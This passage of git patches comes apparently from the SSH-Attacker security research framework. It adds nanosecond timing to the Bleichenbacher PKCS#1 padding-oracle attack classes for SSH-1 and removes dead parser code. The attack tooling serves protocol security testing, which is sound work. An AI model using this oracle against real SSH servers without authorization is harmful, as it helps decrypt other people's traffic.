b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Pkcs1Oracle; import java.math.BigInteger; import java.security.interfaces.RSAPublicKey; +import java.util.ArrayList; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -34,6 +35,13 @@ public class Pkcs1Attack { protected BigInteger bigB; + protected double averageTimeforRequestInnerOracle = 0; + protected double averageTimeforRequestOuterOracle = 0; + + // Array list of longs + protected ArrayList innerTimings = new ArrayList<>(); + protected ArrayList outerTimings = new ArrayList<>(); + /** * @param msg The message that should be decrypted with the attack * @param pkcsOracle The oracle to be queried @@ -99,7 +107,17 @@ protected boolean queryOracle(BigInteger message, BigInteger si) { */ protected boolean queryOracle(BigInteger message, boolean inner) { byte[] msg = ArrayConverter.bigIntegerToByteArray(message); + long start = System.nanoTime(); boolean[] results = oracle.checkDoublePKCSConformity(msg); + long end = System.nanoTime(); + long tookTime = end - start; + if (inner) { + innerTimings.add(tookTime); + averageTimeforRequestInnerOracle = calculateAverage(innerTimings); + } else { + outerTimings.add(tookTime); + averageTimeforRequestOuterOracle = calculateAverage(outerTimings); + } if (inner) { return results[1]; } else { @@ -107,6 +125,14 @@ protected boolean queryOracle(BigInteger message, boolean inner) { } } + protected double calculateAverage(ArrayList timings) { + long sum = 0; + for (Long timing : timings) { + sum += timing; + } + return (double) sum / timings.size(); + } + /** * @param message Message to query the oracle with * @return The return value of the oracle (true/false) @@ -119,4 +145,12 @@ protected boolean queryOracle(BigInteger message) { public BigInteger getSolution() { return solution; } + + public double getAverageTimeforRequestInnerOracle() { + return averageTimeforRequestInnerOracle; + } + + public double getAverageTimeforRequestOuterOracle() { + return averageTimeforRequestOuterOracle; + } } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java index 7a38fa948..a738f1f2a 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java @@ -8,8 +8,6 @@ package de.rub.nds.sshattacker.attacks.pkcs1.oracles; import de.rub.nds.sshattacker.attacks.pkcs1.BleichenbacherWorkflowGenerator; -import de.rub.nds.sshattacker.attacks.response.ResponseExtractor; -import de.rub.nds.sshattacker.attacks.response.ResponseFingerprint; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; @@ -23,7 +21,6 @@ import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; import de.rub.nds.sshattacker.core.workflow.action.GenericReceiveAction; import de.rub.nds.tlsattacker.util.MathHelper; -import java.io.IOException; import java.security.interfaces.RSAPublicKey; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -40,8 +37,10 @@ public class BleichenbacherOracle extends Pkcs1Oracle { private final int maxAttempts; - long timeElapsedforAverageCalculation = 0; - long timeElapsed = 0; + private boolean runningInInner = false; + + private long timeElapsedforAverageCalculation = 0; + private long timeElapsed = 0; /** * @param hostPublicKey The public key @@ -121,21 +120,26 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { if (numberOfQueries % 500 == 0) { LOGGER.warn( String.format( - "[%d] Tries, took per average %f ms per oracle-request, in total %s ms have gone by", + "[%d] Tries, took per average %f ns per oracle-request, in total %s ns have gone by", numberOfQueries, - (timeElapsedforAverageCalculation / (double) 500), + timeElapsedforAverageCalculation / (double) 500, timeElapsed), numberOfQueries, - (timeElapsedforAverageCalculation / 500), + timeElapsedforAverageCalculation / 500, timeElapsed); + averageTimeforRequest = (long) (timeElapsedforAverageCalculation / (double) 500); + if (runningInInner) averageTimeforRequestInnerOracle = averageTimeforRequest; + else { + averageTimeforRequestOuterOracle = averageTimeforRequest; + } timeElapsedforAverageCalculation = 0; } boolean conform[] = {false, false}; try { - long start = System.currentTimeMillis(); + long start = System.nanoTime(); workflowExecutor.executeWorkflow(); - long finish = System.currentTimeMillis(); + long finish = System.nanoTime(); timeElapsedforAverageCalculation = timeElapsedforAverageCalculation + (finish - start); timeElapsed = timeElapsed + (finish - start); @@ -147,10 +151,12 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { } else if (lastMessage instanceof FailureMessageSSH1) { LOGGER.debug("Received Failure Message -> the first one was correct :|"); conform[0] = true; + runningInInner = true; } else if (lastMessage instanceof SuccessMessageSSH1) { LOGGER.info("Received Success Message -> both were correct :)"); conform[0] = true; conform[1] = true; + runningInInner = true; } else { LOGGER.fatal("Something gone wrong with the preconfigured oracle...."); } @@ -160,7 +166,7 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { throw new WorkflowExecutionException("Workflow did not execute as planned!"); } - LOGGER.warn("Try #{} took {}ms to query oracle", numberOfQueries, (finish - start)); + LOGGER.warn("Try #{} took {} ns to query oracle", numberOfQueries, (finish - start)); // clearConnections(state); } catch (WorkflowExecutionException e) { @@ -172,25 +178,4 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { } return conform; } - - private ResponseFingerprint getFingerprint(State state) { - if (state.getWorkflowTrace().allActionsExecuted()) { - return ResponseExtractor.getFingerprint(state); - } else { - LOGGER.debug( - "Could not execute Workflow. Something went wrong... Check the debug output for more information"); - } - return null; - } - - private void clearConnections(State state) { - try { - state.getSshContext(); - if (!state.getSshContext().getTransportHandler().isClosed()) { - state.getSshContext().getTransportHandler().closeConnection(); - } - } catch (IOException ex) { - LOGGER.debug(ex); - } - } } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java index 85096bfb1..7a1b70d31 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java @@ -24,6 +24,10 @@ public abstract class Pkcs1Oracle { @SuppressWarnings("FieldMayBeStatic") protected final boolean plaintextOracle = false; + protected double averageTimeforRequest = 0; + protected double averageTimeforRequestInnerOracle = 0; + protected double averageTimeforRequestOuterOracle = 0; + /** * Gets the block size of the encryption algorithm. * diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java index 0e91be3e6..39b8cd842 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -41,6 +41,7 @@ public class Ssh1MockOracle extends Pkcs1Oracle { private final RSAPublicKey hostPublicKey; private final RSAPublicKey serverPublicKey; private final Cipher cipher; + private boolean runningInInner = false; OracleType oracleType; public Ssh1MockOracle( @@ -85,25 +86,28 @@ private boolean[] oracleStrong(byte[] msg) { LOGGER.info( String.format( "[%d] Tries, took per average %f ms per oracle-request, in total %s ms have gone by", - counter, - (timeElapsedforAverageCalculation / (double) 500), - timeElapsed), + counter, timeElapsedforAverageCalculation / (double) 500, timeElapsed), counter, - (timeElapsedforAverageCalculation / 500), + timeElapsedforAverageCalculation / 500, timeElapsed); - + averageTimeforRequest = timeElapsedforAverageCalculation / (double) 500; + if (runningInInner) averageTimeforRequestInnerOracle = averageTimeforRequest; + else { + averageTimeforRequestOuterOracle = averageTimeforRequest; + } timeElapsedforAverageCalculation = 0; } if (isPlaintextOracle()) { return new boolean[] {true, true}; } else { - long start = System.currentTimeMillis(); + long start = System.nanoTime(); if (hostPublicKey.getModulus().bitLength() > serverPublicKey.getModulus().bitLength()) { byte[] decrypted_byte = decryptMessage(msg, hostPrivateKey); if (decrypted_byte[0] == 0x00 && decrypted_byte[1] == 0x02) { oracleResult[0] = true; + runningInInner = true; } if (oracleResult[0]) { @@ -131,7 +135,7 @@ private boolean[] oracleStrong(byte[] msg) { } } - long finish = System.currentTimeMillis(); + long finish = System.nanoTime(); timeElapsed = timeElapsed + (finish - start); timeElapsedforAverageCalculation = timeElapsedforAverageCalculation + (finish - start); @@ -146,17 +150,19 @@ private boolean[] oracleWeak(byte[] msg) { if (counter % 500 == 0) { LOGGER.info( String.format( - "[%d] Tries, took per average %f ms per oracle-request, in total %s ms have gone by ", - counter, - (timeElapsedforAverageCalculation / (double) 500), - timeElapsed), + "[%d] Tries, took per average %f ns per oracle-request, in total %s ns have gone by ", + counter, timeElapsedforAverageCalculation / (double) 500, timeElapsed), counter, - (timeElapsedforAverageCalculation / 500), + timeElapsedforAverageCalculation / 500, timeElapsed); - + averageTimeforRequest = timeElapsedforAverageCalculation / (double) 500; + if (runningInInner) averageTimeforRequestInnerOracle = averageTimeforRequest; + else { + averageTimeforRequestOuterOracle = averageTimeforRequest; + } timeElapsedforAverageCalculation = 0; } - long start = System.currentTimeMillis(); + long start = System.nanoTime(); if (isPlaintextOracle()) { return new boolean[] {true, true}; @@ -185,6 +191,7 @@ private boolean[] oracleWeak(byte[] msg) { firstStep = cipher.doFinal(msg); oracleResult[0] = true; + runningInInner = true; this.cipher.init(Cipher.DECRYPT_MODE, serverPriv); cipher.doFinal(firstStep); @@ -196,20 +203,21 @@ private boolean[] oracleWeak(byte[] msg) { firstStep = cipher.doFinal(msg); oracleResult[0] = true; + runningInInner = true; this.cipher.init(Cipher.DECRYPT_MODE, hostPriv); cipher.doFinal(firstStep); oracleResult[1] = true; } - long finish = System.currentTimeMillis(); + long finish = System.nanoTime(); timeElapsed = timeElapsed + (finish - start); timeElapsedforAverageCalculation = timeElapsedforAverageCalculation + (finish - start); return oracleResult; } catch (IllegalBlockSizeException | BadPaddingException e) { - long finish = System.currentTimeMillis(); + long finish = System.nanoTime(); timeElapsed = timeElapsed + (finish - start); timeElapsedforAverageCalculation = timeElapsedforAverageCalculation + (finish - start); From 9a20edfc4a73d0710755b77daa032dbb13c79bda Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 29 Mar 2024 12:57:19 +0100 Subject: [PATCH 160/176] Cleanup Code --- .../core/layer/impl/SSH2Layer.java | 8 +- .../common/ProtocolMessageParser.java | 301 ------------------ .../protocol/common/SshMessageParser.java | 11 - 3 files changed, 2 insertions(+), 318 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 3464256b7..1bafeee99 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -694,12 +694,7 @@ private void readChannelOpen(AbstractPacket packet) { inputStream = new HintedInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); - /* try { - inputStream = getLowerLayer().getDataStream(); - } catch (IOException e) { - LOGGER.warn("The lower layer did not produce a data stream: ", e); - return; - }*/ + ChannelOpenUnknownMessageParser parser = new ChannelOpenUnknownMessageParser(inputStream); parser.parse(channelOpenUnknownMessage); String channelTypeString = channelOpenUnknownMessage.getChannelType().getValue(); @@ -729,6 +724,7 @@ private void readVersionExchangeProtocolData(AbstractPacket packet) temp_stream = new HintedInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java index 9b90e000b..76eba0f1e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java @@ -35,33 +35,6 @@ public ProtocolMessageParser(InputStream stream) { super(stream); } - /*public ProtocolMessageParser(byte[] array) { - super(array); - } - - public ProtocolMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - }*/ - - /*@Override - public final T parse() { - parseProtocolMessageContents(); - setCompleteResultingMessage(); - return message; - }*/ - - // protected abstract T createMessage(); - - // protected abstract void parseProtocolMessageContents(); - - /*private void setCompleteResultingMessage() { - message.setCompleteResultingMessage(getAlreadyParsed()); - LOGGER.trace( - "Complete message bytes parsed: " - + ArrayConverter.bytesToHexString( - message.getCompleteResultingMessage().getValue())); - }*/ - public static ProtocolMessage delegateParsing(AbstractPacket packet, SshContext context) { byte[] raw = packet.getPayload().getValue(); try { @@ -95,100 +68,6 @@ public static ProtocolMessage delegateParsing(AbstractPacket packet, SshConte } } - /*switch (MessageIdConstant.fromId(raw[0], context.getContext())) { - case SSH_MSG_KEXINIT: - return new KeyExchangeInitMessageParser(raw).parse(); - case SSH_MSG_KEX_ECDH_INIT: - return new EcdhKeyExchangeInitMessageParser(raw).parse(); - case SSH_MSG_KEX_ECDH_REPLY: - return new EcdhKeyExchangeReplyMessageParser(raw).parse(); - case SSH_MSG_KEXDH_INIT: - return new DhKeyExchangeInitMessageParser(raw).parse(); - case SSH_MSG_KEXDH_REPLY: - return new DhKeyExchangeReplyMessageParser(raw).parse(); - case SSH_MSG_HBR_INIT: - return handleHybridKeyExchangeInitMessageParsing(raw, context).parse(); - case SSH_MSG_HBR_REPLY: - return handleHybridKeyExchangeReplyMessageParsing(raw, context).parse(); - case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: - return new DhGexKeyExchangeOldRequestMessageParser(raw).parse(); - case SSH_MSG_KEX_DH_GEX_REQUEST: - return new DhGexKeyExchangeRequestMessageParser(raw).parse(); - case SSH_MSG_KEX_DH_GEX_GROUP: - return new DhGexKeyExchangeGroupMessageParser(raw).parse(); - case SSH_MSG_KEX_DH_GEX_INIT: - return new DhGexKeyExchangeInitMessageParser(raw).parse(); - case SSH_MSG_KEX_DH_GEX_REPLY: - return new DhGexKeyExchangeReplyMessageParser(raw).parse(); - case SSH_MSG_KEXRSA_PUBKEY: - return new RsaKeyExchangePubkeyMessageParser(raw).parse(); - case SSH_MSG_KEXRSA_SECRET: - return new RsaKeyExchangeSecretMessageParser(raw).parse(); - case SSH_MSG_KEXRSA_DONE: - return new RsaKeyExchangeDoneMessageParser(raw).parse(); - case SSH_MSG_NEWKEYS: - return new NewKeysMessageParser(raw).parse(); - case SSH_MSG_SERVICE_REQUEST: - return new ServiceRequestMessageParser(raw).parse(); - case SSH_MSG_SERVICE_ACCEPT: - return new ServiceAcceptMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: - return new ChannelOpenConfirmationMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_DATA: - return new ChannelDataMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_CLOSE: - return new ChannelCloseMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_EOF: - return new ChannelEofMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_EXTENDED_DATA: - return new ChannelExtendedDataMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_FAILURE: - return new ChannelFailureMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_OPEN_FAILURE: - return new ChannelOpenFailureMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_OPEN: - return handleChannelOpenMessageParsing(raw); - case SSH_MSG_CHANNEL_SUCCESS: - return new ChannelSuccessMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_WINDOW_ADJUST: - return new ChannelWindowAdjustMessageParser(raw).parse(); - case SSH_MSG_DEBUG: - return new DebugMessageParser(raw).parse(); - case SSH_MSG_DISCONNECT: - return new DisconnectMessageParser(raw).parse(); - case SSH_MSG_IGNORE: - return new IgnoreMessageParser(raw).parse(); - case SSH_MSG_REQUEST_FAILURE: - return new GlobalRequestFailureMessageParser(raw).parse(); - case SSH_MSG_REQUEST_SUCCESS: - return new GlobalRequestSuccessMessageParser(raw).parse(); - case SSH_MSG_UNIMPLEMENTED: - return new UnimplementedMessageParser(raw).parse(); - case SSH_MSG_USERAUTH_REQUEST: - return handleUserAuthRequestMessageParsing(raw); - case SSH_MSG_USERAUTH_BANNER: - return new UserAuthBannerMessageParser(raw).parse(); - case SSH_MSG_USERAUTH_FAILURE: - return new UserAuthFailureMessageParser(raw).parse(); - case SSH_MSG_USERAUTH_SUCCESS: - return new UserAuthSuccessMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_REQUEST: - return handleChannelRequestMessageParsing(raw); - case SSH_MSG_GLOBAL_REQUEST: - return handleGlobalRequestMessageParsing(raw); - case SSH_MSG_USERAUTH_INFO_REQUEST: - return new UserAuthInfoRequestMessageParser(raw).parse(); - case SSH_MSG_USERAUTH_INFO_RESPONSE: - return new UserAuthInfoResponseMessageParser(raw).parse(); - default: - LOGGER.debug( - "Received unimplemented Message " - + MessageIdConstant.getNameById(raw[0]) - + " (" - + raw[0] - + ")"); - return new UnknownMessageParser(raw).parse(); - }*/ } catch (ParserException e) { LOGGER.debug("Error while Parsing, now parsing as UnknownMessage: " + e); // return new UnknownMessageParser(raw).parse(); @@ -196,184 +75,4 @@ public static ProtocolMessage delegateParsing(AbstractPacket packet, SshConte return null; } - /*public static HybridKeyExchangeReplyMessageParser handleHybridKeyExchangeReplyMessageParsing( - byte[] raw, Context context) { - LOGGER.info( - "Negotiated Hybrid Key Exchange: " - + context.getChooser().getKeyExchangeAlgorithm()); - switch (context.getChooser().getKeyExchangeAlgorithm()) { - default: - LOGGER.warn( - "Unsupported hybrid key exchange negotiated, treating received HBR_REPLY as sntrup761x25519-sha512@openssh.com"); - // Fallthrough to next case statement intended - case SNTRUP761_X25519: - return new HybridKeyExchangeReplyMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.X25519_POINT_SIZE, - CryptoConstants.SNTRUP761_CIPHERTEXT_SIZE); - case CURVE25519_FRODOKEM1344: - return new HybridKeyExchangeReplyMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.X25519_POINT_SIZE, - CryptoConstants.FRODOKEM1344_CIPHERTEXT_SIZE); - case SNTRUP4591761_X25519: - return new HybridKeyExchangeReplyMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.X25519_POINT_SIZE, - CryptoConstants.SNTRUP4591761_CIPHERTEXT_SIZE); - case NISTP521_FIRESABER: - return new HybridKeyExchangeReplyMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.NISTP521_POINT_SIZE, - CryptoConstants.FIRESABER_CIPHERTEXT_SIZE); - case NISTP521_KYBER1024: - return new HybridKeyExchangeReplyMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.NISTP521_POINT_SIZE, - CryptoConstants.KYBER1024_CIPHERTEXT_SIZE); - } - }*/ - - /*public static HybridKeyExchangeInitMessageParser handleHybridKeyExchangeInitMessageParsing( - byte[] raw, Context context) { - LOGGER.info( - "Negotiated Hybrid Key Exchange: " - + context.getChooser().getKeyExchangeAlgorithm()); - switch (context.getChooser().getKeyExchangeAlgorithm()) { - default: - LOGGER.warn( - "Unsupported hybrid key exchange negotiated, treating received HBR_INIT as sntrup761x25519-sha512@openssh.com"); - // Fallthrough to next case statement intended - case SNTRUP761_X25519: - return new HybridKeyExchangeInitMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.X25519_POINT_SIZE, - CryptoConstants.SNTRUP761_PUBLIC_KEY_SIZE); - case SNTRUP4591761_X25519: - return new HybridKeyExchangeInitMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.X25519_POINT_SIZE, - CryptoConstants.SNTRUP4591761_PUBLIC_KEY_SIZE); - case CURVE25519_FRODOKEM1344: - return new HybridKeyExchangeInitMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.X25519_POINT_SIZE, - CryptoConstants.FRODOKEM1344_PUBLIC_KEY_SIZE); - case NISTP521_FIRESABER: - return new HybridKeyExchangeInitMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.NISTP521_POINT_SIZE, - CryptoConstants.FIRESABER_PUBLIC_KEY_SIZE); - case NISTP521_KYBER1024: - return new HybridKeyExchangeInitMessageParser( - raw, - HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL, - CryptoConstants.NISTP521_POINT_SIZE, - CryptoConstants.KYBER1024_PUBLIC_KEY_SIZE); - } - } - - private static ProtocolMessage handleUserAuthRequestMessageParsing(byte[] raw) { - UserAuthUnknownMessage message = new UserAuthUnknownMessageParser(raw).parse(); - String methodString = message.getMethodName().getValue(); - AuthenticationMethod method = AuthenticationMethod.fromName(methodString); - switch (method) { - case NONE: - return new UserAuthNoneMessageParser(raw).parse(); - case PASSWORD: - return new UserAuthPasswordMessageParser(raw).parse(); - case PUBLICKEY: - return new UserAuthPubkeyMessageParser(raw).parse(); - case HOST_BASED: - return new UserAuthHostbasedMessageParser(raw).parse(); - case KEYBOARD_INTERACTIVE: - return new UserAuthKeyboardInteractiveMessageParser(raw).parse(); - default: - LOGGER.debug( - "Received unimplemented user authentication method in user authentication request: {}", - methodString); - return message; - } - }*/ - - /*public static ProtocolMessage handleChannelRequestMessageParsing(byte[] raw) { - ChannelRequestUnknownMessage message = new ChannelRequestUnknownMessageParser(raw).parse(); - String requestTypeString = message.getRequestType().getValue(); - ChannelRequestType requestType = ChannelRequestType.fromName(requestTypeString); - switch (requestType) { - case PTY_REQ: - return new ChannelRequestPtyMessageParser(raw).parse(); - case X11_REQ: - return new ChannelRequestX11MessageParser(raw).parse(); - case ENV: - return new ChannelRequestEnvMessageParser(raw).parse(); - case SHELL: - return new ChannelRequestShellMessageParser(raw).parse(); - case EXEC: - return new ChannelRequestExecMessageParser(raw).parse(); - case SUBSYSTEM: - return new ChannelRequestSubsystemMessageParser(raw).parse(); - case WINDOW_CHANGE: - return new ChannelRequestWindowChangeMessageParser(raw).parse(); - case XON_XOFF: - return new ChannelRequestXonXoffMessageParser(raw).parse(); - case SIGNAL: - return new ChannelRequestSignalMessageParser(raw).parse(); - case EXIT_STATUS: - return new ChannelRequestExitStatusMessageParser(raw).parse(); - case EXIT_SIGNAL: - return new ChannelRequestExitSignalMessageParser(raw).parse(); - case AUTH_AGENT_REQ_OPENSSH_COM: - return new ChannelRequestAuthAgentMessageParser(raw).parse(); - default: - LOGGER.debug( - "Received unimplemented channel request message type: {}", - requestTypeString); - return message; - } - }*/ - - /*public static ProtocolMessage handleGlobalRequestMessageParsing(byte[] raw) { - GlobalRequestUnknownMessage message = new GlobalRequestUnknownMessageParser(raw).parse(); - String requestTypeString = message.getRequestName().getValue(); - GlobalRequestType requestType = GlobalRequestType.fromName(requestTypeString); - switch (requestType) { - case TCPIP_FORWARD: - return new GlobalRequestTcpIpForwardMessageParser(raw).parse(); - case CANCEL_TCPIP_FORWARD: - return new GlobalRequestCancelTcpIpForwardMessageParser(raw).parse(); - case NO_MORE_SESSIONS_OPENSSH_COM: - return new GlobalRequestNoMoreSessionsMessageParser(raw).parse(); - case HOSTKEYS_00_OPENSSH_COM: - return new GlobalRequestOpenSshHostKeysMessageParser(raw).parse(); - default: - LOGGER.debug( - "Received unimplemented global request message type: {}", - requestTypeString); - return message; - } - } - - public static ProtocolMessage handleChannelOpenMessageParsing(byte[] raw) { - ChannelOpenUnknownMessage message = new ChannelOpenUnknownMessageParser(raw).parse(); - String channelTypeString = message.getChannelType().getValue(); - ChannelType channelType = ChannelType.fromName(channelTypeString); - switch (channelType) { - case SESSION: - return new ChannelOpenSessionMessageParser(raw).parse(); - default: - LOGGER.debug( - "Received unimplemented channel open message type: {}", channelTypeString); - return message; - } - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java index 27365477e..2a7baf80b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java @@ -15,21 +15,10 @@ public abstract class SshMessageParser> extends ProtocolMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - - /*public SshMessageParser(byte[] array) { - protected SshMessageParser(byte[] array) { - super(array); - } - - protected SshMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - }*/ - public SshMessageParser(InputStream stream) { super(stream); } - /*@Override*/ protected final void parseProtocolMessageContents(T message) { parseMessageID(message); parseMessageSpecificContents(message); From ace9f2ffc67e19fbe8db0e889f5933e265717834 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 29 Mar 2024 12:57:35 +0100 Subject: [PATCH 161/176] minor improvements to streamhandling --- .../de/rub/nds/sshattacker/core/layer/ProtocolLayer.java | 5 +++-- .../de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java | 1 + 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index f8f4e6226..007bcd036 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -180,7 +180,7 @@ public HintedInputStream getDataStream() throws IOException { return currentInputStream; } else { throw new EndOfStreamException( - "The original data stream does not produce any more data and there is no next datastream -> returning now"); + "The original data stream does not produce any more data and there is no next datastream"); } /*throw new EndOfStreamException( "The original data stream does not produce any more data and there is no next datastream -> returning now");*/ @@ -215,7 +215,7 @@ public boolean shouldContinueProcessing() { if (layerConfiguration != null) { if (layerConfiguration instanceof GenericReceiveLayerConfiguration) { // stop collecting more containers, if already got one - if (layerConfiguration.getContainerList().size() > 0) { + if (!layerConfiguration.getContainerList().isEmpty()) { return false; } else { return true; @@ -266,6 +266,7 @@ protected void readDataContainer(ContainerT container, LayerContext context) { protected void readContainerFromStream( ContainerT container, LayerContext context, HintedInputStream inputStream) { + Parser parser = container.getParser(context, inputStream); try { parser.parse(container); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 6136e08e7..7fda25f4b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -198,6 +198,7 @@ public void receiveMoreData() throws IOException { LOGGER.debug(ex); } catch (EndOfStreamException ex) { LOGGER.debug("Reached end of stream, cannot parse more messages", ex); + throw ex; } } From 5341cf8659e2e2a14ed3560749e76f7db501aa43 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 29 Mar 2024 13:04:12 +0100 Subject: [PATCH 162/176] Codecleanup --- .../config/BleichenbacherCommandConfig.java | 20 +++++--------- .../attacks/pkcs1/Pkcs1Attack.java | 4 +-- .../attacks/pkcs1/oracles/Pkcs1Oracle.java | 6 ++--- .../core/layer/impl/PacketLayer.java | 13 ++++------ .../sshattacker/core/packet/BinaryPacket.java | 3 +-- .../core/packet/BinaryPacketSSHv1.java | 3 +-- .../BinaryPacketSerializerSSHv1.java | 13 ++-------- .../common/ProtocolMessageParser.java | 9 ++----- .../protocol/common/SshMessageParser.java | 1 + .../handler/ChannelCloseMessageHandler.java | 24 ----------------- .../handler/ChannelDataMessageHandler.java | 25 ------------------ .../handler/ChannelEofMessageHandler.java | 24 ----------------- .../ChannelExtendedDataMessageHandler.java | 25 ------------------ .../handler/ChannelFailureMessageHandler.java | 24 ----------------- ...ChannelOpenConfirmationMessageHandler.java | 25 ------------------ .../ChannelOpenFailureMessageHandler.java | 24 ----------------- .../ChannelOpenSessionMessageHandler.java | 24 ----------------- .../message/ChannelExtendedDataMessage.java | 11 ++------ .../parser/ChannelCloseMessageParser.java | 14 ---------- .../parser/ChannelDataMessageParser.java | 16 ------------ .../parser/ChannelEofMessageParser.java | 14 ---------- .../ChannelExtendedDataMessageParser.java | 18 ------------- .../parser/ChannelFailureMessageParser.java | 14 ---------- .../parser/ChannelMessageParser.java | 7 ----- .../ChannelOpenConfirmationMessageParser.java | 13 ---------- .../ChannelOpenFailureMessageParser.java | 14 ---------- .../parser/ChannelOpenMessageParser.java | 8 +----- ...tRequestForwardingMessageSSHV1Handler.java | 5 ---- .../handler/AsciiMessageHandler.java | 26 ------------------- .../transport/parser/AsciiMessageParser.java | 14 +--------- .../parser/ExtensionInfoMessageParser.java | 2 -- 31 files changed, 27 insertions(+), 416 deletions(-) diff --git 